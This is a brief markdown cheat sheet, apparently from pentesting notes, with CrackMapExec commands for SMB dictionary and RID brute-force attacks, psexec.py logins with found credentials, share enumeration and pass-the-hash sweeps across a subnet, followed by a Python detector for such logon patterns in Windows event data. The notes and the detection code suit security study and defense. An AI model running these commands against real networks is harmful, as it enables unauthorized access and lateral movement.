2022-11-11 01:15:07 +01:00
# Crackmapexec
2024-01-11 05:40:49 +01:00
## Dictionary attack against SMB
```sh
cme <smb/mssql> <domain/IP> -u <user> -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-success --no-brute
```
## Brute Force attack against SMB
Brute force attack using an anonymous user
```sh
cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
```
## Use Found Password
Use the password with `impacket/examples/psexec.py` in the following way:
```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```
## Enumerate Shares
Check user permissions on shares
```sh
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
```
## SMB
Check a user's hash across the network via SMB
```sh
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
```
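
Seen from the defending side, the dictionary attack and the `/24` credential checks above surface as network logon events on the target hosts. The following is an added example, not part of the original notes: it flags both patterns in Windows logon events, assuming the events have been exported to the constructed one-line format shown in `SAMPLE` (the format, thresholds and function names are assumptions).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not from the page): time, event ID, logon type, host,
# account, source IP. 4625 = failed logon, 4624 = successful logon,
# logon type 3 = network logon, which is what SMB authentication records.
SAMPLE = """\
2024-01-11T05:40:01 4625 3 FS01 alice 10.200.5.77
2024-01-11T05:40:02 4625 3 FS01 alice 10.200.5.77
2024-01-11T05:40:03 4625 3 FS01 alice 10.200.5.77
2024-01-11T05:40:04 4625 3 FS01 alice 10.200.5.77
2024-01-11T05:40:05 4624 3 FS01 alice 10.200.5.77
2024-01-11T05:41:00 4624 3 FS01 bob 10.200.5.77
2024-01-11T05:41:01 4624 3 FS02 bob 10.200.5.77
2024-01-11T05:41:02 4625 3 DC01 bob 10.200.5.77
2024-01-11T09:00:00 4625 3 FS01 carol 10.200.5.20
2024-01-11T09:00:30 4624 2 WS07 carol 127.0.0.1
"""

def parse(text):
    """Yield (time, event_id, logon_type, host, account, source) tuples."""
    for line in text.splitlines():
        ts, eid, ltype, host, account, source = line.split()
        yield datetime.fromisoformat(ts), int(eid), int(ltype), host, account, source

def detect(text, max_failures=3, max_hosts=2, window=timedelta(minutes=5)):
    """Return (guessing, sweeps) as sets of (source, account) pairs."""
    failures, hosts = defaultdict(list), defaultdict(list)
    guessing, sweeps = set(), set()
    for ts, eid, ltype, host, account, source in sorted(parse(text)):
        if ltype != 3 or eid not in (4624, 4625):
            continue  # only network logon attempts are relevant here
        key = (source, account)
        if eid == 4625:
            # Keep only the failures still inside the sliding window.
            failures[key] = [t for t in failures[key] if ts - t <= window] + [ts]
            if len(failures[key]) > max_failures:
                guessing.add(key)
        # Success or failure, record which host this pair just touched.
        hosts[key] = [(t, h) for t, h in hosts[key] if ts - t <= window] + [(ts, host)]
        if len({h for _, h in hosts[key]}) > max_hosts:
            sweeps.add(key)
    return guessing, sweeps

if __name__ == "__main__":
    guessing, sweeps = detect(SAMPLE)
    print("password guessing:", sorted(guessing))
    print("multi-host sweep:", sorted(sweeps))
```

The thresholds are deliberately low to fit the sample; tune `max_failures`, `max_hosts` and `window` against normal logon volume before alerting on them.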